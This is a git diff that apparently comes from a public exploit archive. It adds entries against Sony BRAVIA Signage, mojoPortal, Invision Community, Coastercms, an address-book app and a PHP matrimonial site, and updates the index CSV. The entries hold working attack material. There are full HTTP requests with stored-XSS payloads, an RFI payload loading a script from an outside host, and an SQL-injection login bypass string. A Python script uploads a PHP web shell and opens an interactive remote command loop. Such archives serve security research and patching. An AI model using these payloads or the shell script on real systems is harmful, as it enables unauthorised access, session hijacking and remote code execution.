diff --git a/exploits/hardware/webapps/49186.txt b/exploits/hardware/webapps/49186.txt
new file mode 100644
index 000000000..651176bdb
--- /dev/null
+++ b/exploits/hardware/webapps/49186.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: BRAVIA digital signage is vulnerable to a remote file
+inclusion (RFI) vulnerability by including arbitrary client-side
+dynamic scripts (JavaScript, VBScript, HTML) when adding content
+though the input URL material of type html. This allows hijacking
+the current session of the user, execute cross-site scripting code
+or changing the look of the page and content modification on current
+display.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5612
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
+
+
+20.09.2020
+
+--
+
+
+Request:
+--------
+
+POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
+Host: 192.168.1.20:8080
+Proxy-Connection: keep-alive
+Content-Length: 468
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Origin: http://192.168.1.20:8080
+Referer: http://192.168.1.20:8080/test.txt
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: io=RslVZVH6Dc8WsOn5AAAJ
+
+{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49187.txt b/exploits/hardware/webapps/49187.txt
new file mode 100644
index 000000000..91cb0f96b
--- /dev/null
+++ b/exploits/hardware/webapps/49187.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: The application is vulnerable to sensitive information
+disclosure vulnerability. An unauthenticated attacker can
+visit several API endpoints and disclose information running
+on the device.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5610
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
+
+
+20.09.2020
+
+--
+
+
+$ curl http://192.168.1.20:8080/api/system
+
+{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49182.txt b/exploits/multiple/webapps/49182.txt
new file mode 100644
index 000000000..c82f2cb0b
--- /dev/null
+++ b/exploits/multiple/webapps/49182.txt
@@ -0,0 +1,20 @@
+# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
+# Date: 02-12-2020
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/egm-address-book/
+# Version: 1.0
+# Tested on: PopOS
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/Address%20Book/login.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed cpanel without any
+credentials
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49184.txt b/exploits/multiple/webapps/49184.txt
new file mode 100644
index 000000000..4ec2ea96b
--- /dev/null
+++ b/exploits/multiple/webapps/49184.txt
@@ -0,0 +1,42 @@
+# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
+# Date: 3-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://mojoportal.com
+# Software Link: https://www.mojoportal.com/download
+# Version: 2.7.0.0
+# Tested on: Windows 10/Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Edit Forum 'Title :'.
+
+Steps-To-Reproduce:
+1. Login to the Admin Account 
+2. Go to the Forums.
+3. click on Add Forum.
+4. Add payload to Title: <script>alert(1)</script>
+5. Click on Create New Forum.
+6. As soon as admin or any visitor visit the forum the XSS payload will triage.
+
+
+Post Request -
+'''
+
+POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5037
+Origin: https://localhost
+Connection: close
+Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1
+Upgrade-Insecure-Requests: 1
+
+__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums
+
+'''
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49188.txt b/exploits/multiple/webapps/49188.txt
new file mode 100644
index 000000000..198aa9c9d
--- /dev/null
+++ b/exploits/multiple/webapps/49188.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
+# Date: 02-12-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://invisioncommunity.com/
+# Software Link: https://invisioncommunity.com/buy
+# Version: 4.5.4
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile - Field Name.
+
+Steps-To-Reproduce:
+1. Go to the Invision Community admin page.
+2. Now go to the Members - MEMBER SETTINGS - Profiles.
+3. Now click on Add Profile field.
+4. Put the below payload in Field Name:
+"<script>alert(123)</script>"
+5. Now click on Save button.
+6. The XSS will be triggered.
+
+
+POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 660
+Accept: */*
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: XYZ
+
+form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
\ No newline at end of file
diff --git a/exploits/php/webapps/49137.txt b/exploits/php/webapps/49137.txt
index 1fa8e7bcd..94857d566 100644
--- a/exploits/php/webapps/49137.txt
+++ b/exploits/php/webapps/49137.txt
@@ -5,6 +5,7 @@
 # Software Link: https://lepton-cms.org/english/download/archive.php
 # Version: 4.7.0
 # Tested on: Windows 10/Kali Linux
+# CVE: CVE-2020-29240
 
 Stored Cross-site scripting(XSS):
 Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
diff --git a/exploits/php/webapps/49181.txt b/exploits/php/webapps/49181.txt
new file mode 100644
index 000000000..70d02200e
--- /dev/null
+++ b/exploits/php/webapps/49181.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Coastercms 5.8.18 - Stored XSS
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.coastercms.org/
+# Software Link: https://www.coastercms.org/
+# Version: 5.8.18
+# Tested on Windows 10
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit Page tab
+
+Steps to reproduce:
+1: Navigate to "http://localhost/admin/login" and log in with
+admin credentials.
+2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
+click on the edit page.
+3: Then add the payload "<script>alert(123)</script>" & Payload
+"<h1>test</h1>", and cliock on update button. Saved succesfully.
+4: Now, click on "View live page" and it will redirect you to the live page
+at "http://localhost/homepage/blog" and XSS will get stored and
+trigger on the main home page
\ No newline at end of file
diff --git a/exploits/php/webapps/49183.py b/exploits/php/webapps/49183.py
new file mode 100755
index 000000000..f2b082ac6
--- /dev/null
+++ b/exploits/php/webapps/49183.py
@@ -0,0 +1,94 @@
+# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
+# Exploit Author: Valerio Alessandroni
+# Date: 2020-10-07
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
+# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
+# Version: 1.0
+# Tested On: Server Linux Ubuntu 18.04, Apache2
+# Version: Python 2.x
+# Impact: Code Execution
+# Affected components: Affected move_uploaded_file() function in functions.php file.
+# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
+#
+# Additional information:
+#
+# To exploit this vulnerability:
+# 1) register a not privileged user at /register.php
+# 2) login in the application /login.php
+# 3) keep note of the redirect with the GET 'id' parameter  /userhome.php?id=[ID]
+# 4) go to the page /photouploader.php?id=[ID]
+# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
+# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
+# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
+#
+# How to use it:
+# python exploit.py [URL] [USERNAME] [PASSWORD]
+
+
+import requests, sys, urllib, re, time
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL, ID, FILE_NAME):
+    try:
+        print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
+        time.sleep(1)
+        WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
+        getCMD  = {'cmd': 'echo ciao'}
+        r2 = requests.get(WEB_SHELL, params=getCMD)
+        status = r2.status_code
+        if status != 200:
+            print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+            r2.raise_for_status()
+        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+        while True:
+             
+             inputCMD = raw_input('$ ')
+             command = {'cmd': inputCMD}
+             r2 = requests.get(WEB_SHELL, params=command, verify=False)
+             print r2.text
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+def printHeader():
+     print(Fore.GREEN+"___  ___              _  _          _ "+Fore.RED+"     ______  _____  _____")
+     print(Fore.GREEN+"|  \/  |             (_)| |        | |"+Fore.RED+"     | ___ \/  __ \|  ___|")
+     print(Fore.GREEN+"| .  . |  __ _  _ __  _ | |_  __ _ | |"+Fore.RED+"     | |_/ /| /  \/| |__  ")
+     print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+"     |    / | |    |  __| ")
+     print(Fore.GREEN+"| |  | || (_| || |   | || |_| (_| || |"+Fore.RED+"     | |\ \ | \__/\| |___ ")
+     print(Fore.GREEN+"\_|  |_/ \__,_||_|   |_| \__|\__,_||_|"+Fore.RED+"     \_| \_| \____/\____/ ")
+     print ''                                                       
+
+
+
+if __name__ == "__main__":
+    printHeader()
+    if len(sys.argv) != 4:
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    SERVER_URI = SERVER_URL + 'auth/auth.php'
+    LOGIN_PARAMS = {'user': '1'}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
+    print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
+    time.sleep(1)
+    for resp in req.history:
+        COOKIES = resp.cookies.get_dict()
+        SPLITTED = resp.headers["location"].split("=")
+        ID = SPLITTED[1]
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
+    time.sleep(1)
+    SERVER_URI = SERVER_URL + 'photouploader.php'
+    LOGIN_PARAMS = {'id': ID}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    FILE_NAME = 'shell.php'
+    FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
+    time.sleep(1)
+    webshell(SERVER_URL, ID, FILE_NAME)
\ No newline at end of file
diff --git a/exploits/windows/remote/43936.py b/exploits/windows/remote/43936.py
index 0c9757302..972cee8c0 100755
--- a/exploits/windows/remote/43936.py
+++ b/exploits/windows/remote/43936.py
@@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 
-    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    print "[*] Testing connection to target %s:%s" %(host,port)
     s.connect((host, port))
 
 except:
diff --git a/files_exploits.csv b/files_exploits.csv
index 14491d65f..3e318052e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43369,7 +43369,8 @@ id,file,description,date,author,type,platform,port
 49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
 49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
-49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
+49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
+49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
 49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
 49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
 49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
@@ -43399,3 +43400,9 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
+49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
+49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
